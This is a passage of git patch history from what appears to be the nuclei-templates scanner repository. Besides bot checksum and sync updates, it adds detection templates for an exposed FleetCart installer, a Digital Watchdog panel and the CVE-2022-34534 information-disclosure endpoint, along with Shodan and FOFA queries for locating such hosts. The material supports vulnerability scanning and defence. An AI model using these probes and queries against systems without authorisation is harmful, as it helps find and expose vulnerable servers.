http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 +http/cves/2024/CVE-2024-5230.yaml:27a9920bb129073dfab0352ad0228520072142a8 http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8569,7 +8570,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8ef346790e190638a75fc498b6c1129dd1cf2c83 +templates-checksum.txt:a28027d00ed5fbb51ad08da319e30f7e863bcd26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 55132aa3ae602ae672c560c4cedf8a626e02fdf7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:29:20 +0000 Subject: [PATCH 331/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7796c01f4d..d8223308c0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' From 0acf69e55b144bed7497bb2093c8d1b3e0a750a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:29:32 +0000 Subject: [PATCH 332/847] Auto Template Signing [Tue May 28 04:29:32 UTC 2024] :robot: --- http/misconfiguration/installer/openemr-setup-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml index d4675908b6..150f54f472 100644 --- a/http/misconfiguration/installer/openemr-setup-installer.yaml +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc70c1d867d7532dd779db232791006e527e526e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:30:21 +0000 Subject: [PATCH 333/847] Auto Generated Templates Checksum [Tue May 28 04:30:21 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 279664685c..6826a11ea5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3686,6 +3686,7 @@ http/exposed-panels/cisco/cisco-telepresence.yaml:e9b4284c22e08f4917559c6be0860d http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:30c5f3cfe8561c54e0adb4d02392c6da5b62a065 http/exposed-panels/cisco/cisco-vmanage-login.yaml:5351d182ea82467eccbd30dd51a81fb025495a09 http/exposed-panels/cisco/cisco-webvpn-detect.yaml:13e201d34aa8034c696fa5c262ea118ddda3adc6 +http/exposed-panels/cisco-firepower-panel.yaml:57420b28c1d1907c75a5b2ebc1e635c53a47acbe http/exposed-panels/cisco-unity-panel.yaml:6fae7cdb91904c1e5848876a1de55d505ef868bb http/exposed-panels/citrix-adc-gateway-detect.yaml:799ec0472142a2c95e6aa9611b7ad1404bd0b433 http/exposed-panels/citrix-vpn-detect.yaml:6d5b20d32d07689c25e8552271fde112a03f301c @@ -5458,7 +5459,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/openemr-setup-installer.yaml:42580122b5f3baf39b6ed9ce05448787892a186e +http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 @@ -8570,7 +8571,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a28027d00ed5fbb51ad08da319e30f7e863bcd26 +templates-checksum.txt:ea98d771b89481a5a5a7adf96b1305eeb52c0b96 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From db9c29ff3ac90446af8769af837db1c03cce075b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 10:00:32 +0530 Subject: [PATCH 334/847] Create fleetcart-installer.yaml --- .../installer/fleetcart-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/fleetcart-installer.yaml diff --git a/http/misconfiguration/installer/fleetcart-installer.yaml b/http/misconfiguration/installer/fleetcart-installer.yaml new file mode 100644 index 0000000000..5f1c3542a1 --- /dev/null +++ b/http/misconfiguration/installer/fleetcart-installer.yaml @@ -0,0 +1,31 @@ +id: fleetcart-installer + +info: + name: FleetCart Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed FleetCart setup installation pages which could allow unauthorized access or information disclosure. + reference: + - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + metadata: + verified: true + max-request: 1 + shodan-query: html:"FleetCart - Installation" + tags: misconfig,install,exposure,fleetcart + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "FleetCart - Installation" + + - type: status + status: + - 200 From cbde017dc639106a8555421de7a442dd534f4467 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:31:01 +0000 Subject: [PATCH 335/847] Auto Generated New Template Addition List [Tue May 28 04:31:01 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 91904d5827..a12e385e85 100644 --- a/.new-additions +++ b/.new-additions @@ -6,7 +6,9 @@ http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 0b7e90f165a519a33c8df5a7fe5a36fdf2c35411 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:31:08 +0000 Subject: [PATCH 336/847] Auto Generated Templates Checksum [Tue May 28 04:31:08 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6826a11ea5..92a41fc52e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6764,6 +6764,7 @@ http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333 http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb +http/technologies/gotweb-detect.yaml:8fc5e3378e4984c8e405a36d33067d00f719889f http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:968b73b40f5fcb70f7ce8ed1c620f59611886e97 http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 @@ -8571,7 +8572,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ea98d771b89481a5a5a7adf96b1305eeb52c0b96 +templates-checksum.txt:6846caba734b2f189845b0d4401d9a821b0c352a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 34e61d0067f050aa6f4accda98227a6168fe89d7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:31:48 +0000 Subject: [PATCH 337/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d8223308c0..eb2b7515c3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,8 +11,10 @@ on: - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' + - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From dc106eb44b619a5e5284099fdca643995598c6f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:32:07 +0000 Subject: [PATCH 338/847] Auto Template Signing [Tue May 28 04:32:07 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5230.yaml | 1 + http/exposed-panels/cisco-firepower-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index 64b2bb9e0e..8e9a21cbc1 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -41,3 +41,4 @@ http: words: - "razorpayKeyId: ''" negative: true +# digest: 4a0a0047304502202589ef7ca56aded6f60e4a6c0894c0b451861abb90f144b7ae86726f61ea08660221009037f9cdb2941ceee500ec88de24b43cc3c61b752e03131c46470c4a62ea090a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index ff88c46fa1..da59aded97 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -39,3 +39,4 @@ http: group: 1 regex: - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" +# digest: 4a0a004730450220026366c1c44b76bd077fdcb97ff6b07b21fbe1b9b87a25d978c0aa9f8e0a9bd3022100f60575f7d011eacf77f7a25d0c6b632bba00038b40986cd2fc2cdee645ee975e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a2b2f43baca2b13a340310412151cddffce80b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 13:15:26 +0530 Subject: [PATCH 339/847] Create CVE-2022-34534.yaml --- http/cves/2022/CVE-2022-34534.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2022/CVE-2022-34534.yaml diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml new file mode 100644 index 0000000000..7b7501b58a --- /dev/null +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-34534 + +info: + name: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure + author: ritikchaddha + severity: high + description: | + Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call. + reference: + - https://gist.github.com/secgrant/820faeeaa0cb4889edaa1d6fef83deab + - https://nvd.nist.gov/vuln/detail/CVE-2022-34534 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34534 + cwe-id: CWE-200 + cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dw + product: spectrum_server + shodan-query: http.favicon.hash:868509217 + fofa-query: icon_hash="868509217" + tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/moduleInformation" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "name\":", "cloudHost\":", "remoteAddresses")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From 4ff6028c801a44a63f62076c0cad1cc5dfad4f9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 13:42:41 +0530 Subject: [PATCH 340/847] minor update --- http/cves/2022/CVE-2022-34534.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index 7b7501b58a..fae020741f 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -14,12 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34534 cwe-id: CWE-200 + epss-score: 0.0015 + epss-percentile: 0.51136 cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dw - product: spectrum_server + product: spectrum_server_firmware shodan-query: http.favicon.hash:868509217 fofa-query: icon_hash="868509217" tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure From 5703f615d65965c3bc16632f520684caab264e6c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:15:48 +0000 Subject: [PATCH 341/847] Auto Generated New Template Addition List [Tue May 28 08:15:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a12e385e85..24579f4fac 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml +http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml From 54f61a8a28e31b26fc2c04bde908c209083f6964 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:15:59 +0000 Subject: [PATCH 342/847] Auto Generated Templates Checksum [Tue May 28 08:15:59 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92a41fc52e..a5daed5fe1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2727,6 +2727,7 @@ http/cves/2022/CVE-2022-34093.yaml:d833077c3ed2bacc7f3727cc8b423acfc2a3ac5a http/cves/2022/CVE-2022-34094.yaml:dab272e28788fe06a9fba7dcfb3794e42b03f59f http/cves/2022/CVE-2022-34121.yaml:80284aa2ee2e18c06f64a2744b0215855866624c http/cves/2022/CVE-2022-34328.yaml:6c4ef061ec996841be3e4b953085fd717719a55c +http/cves/2022/CVE-2022-34534.yaml:824d6f0bde84220544d30db4a3423ccc9ab42892 http/cves/2022/CVE-2022-34576.yaml:b3007f2a02f22b1b712f6c3dce81e78d002de661 http/cves/2022/CVE-2022-34590.yaml:976120387598d43ed2f73139b0b4b0e641cdeff3 http/cves/2022/CVE-2022-34753.yaml:27251e7b69ecc21f41223cab8a946027d57de4f3 @@ -3309,7 +3310,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 -http/cves/2024/CVE-2024-5230.yaml:27a9920bb129073dfab0352ad0228520072142a8 +http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3686,7 +3687,7 @@ http/exposed-panels/cisco/cisco-telepresence.yaml:e9b4284c22e08f4917559c6be0860d http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:30c5f3cfe8561c54e0adb4d02392c6da5b62a065 http/exposed-panels/cisco/cisco-vmanage-login.yaml:5351d182ea82467eccbd30dd51a81fb025495a09 http/exposed-panels/cisco/cisco-webvpn-detect.yaml:13e201d34aa8034c696fa5c262ea118ddda3adc6 -http/exposed-panels/cisco-firepower-panel.yaml:57420b28c1d1907c75a5b2ebc1e635c53a47acbe +http/exposed-panels/cisco-firepower-panel.yaml:177776db2f788ac7c3bb6fb4b0c242d4921c58af http/exposed-panels/cisco-unity-panel.yaml:6fae7cdb91904c1e5848876a1de55d505ef868bb http/exposed-panels/citrix-adc-gateway-detect.yaml:799ec0472142a2c95e6aa9611b7ad1404bd0b433 http/exposed-panels/citrix-vpn-detect.yaml:6d5b20d32d07689c25e8552271fde112a03f301c @@ -8572,7 +8573,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6846caba734b2f189845b0d4401d9a821b0c352a +templates-checksum.txt:7f6572fd3b1171faed95bc9512f0bfba664e1923 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 60ac56d35cac4ee9a7f22c9f79d86e2d27d15a9b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:16:28 +0000 Subject: [PATCH 343/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eb2b7515c3..0ab3bc39c7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' From 0e89cf131af54eab375266407698accd50e0bbed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:17:40 +0000 Subject: [PATCH 344/847] Auto Template Signing [Tue May 28 08:17:40 UTC 2024] :robot: --- http/cves/2022/CVE-2022-34534.yaml | 1 + http/technologies/gotweb-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index fae020741f..d997949422 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -38,3 +38,4 @@ http: - 'contains(header, "application/json")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100b929a8a54afa3e963a79545f42fc9bdb1dddd4510cd9fbdb0f34370d45eeef54022100ef046751c804e934307fb72d4183de3b54ab818022b2c7b7e0bb35b6bc09269e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml index d4c2959378..8e2078ec9d 100644 --- a/http/technologies/gotweb-detect.yaml +++ b/http/technologies/gotweb-detect.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205504c5fe1b00986f68d46e91a7847a7369a6a1aeed9e8a8b009e4699a085639602201b2a268978bb59434f09cd5ea4b7e7ca053e022af5c0b186f1d032c6cdfe1b8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9cb01fdd00eb10b82a347823c08a461da6ff3dd5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:06:32 +0530 Subject: [PATCH 345/847] Create digital-watchdog-panel.yaml --- .../digital-watchdog-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/digital-watchdog-panel.yaml diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml new file mode 100644 index 0000000000..a347524716 --- /dev/null +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -0,0 +1,27 @@ +id: digital-watchdog-panel + +info: + name: Digital Watchdog - Detect + author: ritikchaddha + severity: info + description: | + Digital Watchdog panel was detected. + metadata: + max-request: 1 + verified: true + fofa-query: icon_hash="868509217" + shodan-query: http.favicon.hash:868509217 + tags: digital-watchdog,panel,detect,login,dw,spectrum + +http: + - method: GET + path: + - "{{BaseURL}}/static/images/favicon.ico" + - "{{BaseURL}}/static/customization/favicon.ico" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" From fc8bbb2aee7d2afcd270a000ebcf4ea61d9bc89f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:40:39 +0000 Subject: [PATCH 346/847] Auto Generated New Template Addition List [Tue May 28 08:40:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 24579f4fac..088d1e3152 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 442133a7470a901559af3ce9f8a0eac353790046 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:40:44 +0000 Subject: [PATCH 347/847] Auto Generated Templates Checksum [Tue May 28 08:40:44 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a5daed5fe1..4d36c324bc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2727,7 +2727,7 @@ http/cves/2022/CVE-2022-34093.yaml:d833077c3ed2bacc7f3727cc8b423acfc2a3ac5a http/cves/2022/CVE-2022-34094.yaml:dab272e28788fe06a9fba7dcfb3794e42b03f59f http/cves/2022/CVE-2022-34121.yaml:80284aa2ee2e18c06f64a2744b0215855866624c http/cves/2022/CVE-2022-34328.yaml:6c4ef061ec996841be3e4b953085fd717719a55c -http/cves/2022/CVE-2022-34534.yaml:824d6f0bde84220544d30db4a3423ccc9ab42892 +http/cves/2022/CVE-2022-34534.yaml:9ffb8d48988fbf1da5a24e59db586356c05d2c9b http/cves/2022/CVE-2022-34576.yaml:b3007f2a02f22b1b712f6c3dce81e78d002de661 http/cves/2022/CVE-2022-34590.yaml:976120387598d43ed2f73139b0b4b0e641cdeff3 http/cves/2022/CVE-2022-34753.yaml:27251e7b69ecc21f41223cab8a946027d57de4f3 @@ -5423,6 +5423,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/fleetcart-installer.yaml:74f546acf0efc56a070cc599f27750eb435a424c http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a @@ -6765,7 +6766,7 @@ http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333 http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb -http/technologies/gotweb-detect.yaml:8fc5e3378e4984c8e405a36d33067d00f719889f +http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0 http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:968b73b40f5fcb70f7ce8ed1c620f59611886e97 http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 @@ -8573,7 +8574,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f6572fd3b1171faed95bc9512f0bfba664e1923 +templates-checksum.txt:34021addf8a4e019d1b4fbd148bbb25b5d32e69e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 28bc3690e4b5845737847a5fcb14a4d3c5511e7c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:41:29 +0000 Subject: [PATCH 348/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0ab3bc39c7..4cee8c2b81 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From 4cd6f142ef3c4d0efe7df6cfcced07cc80214f0a Mon 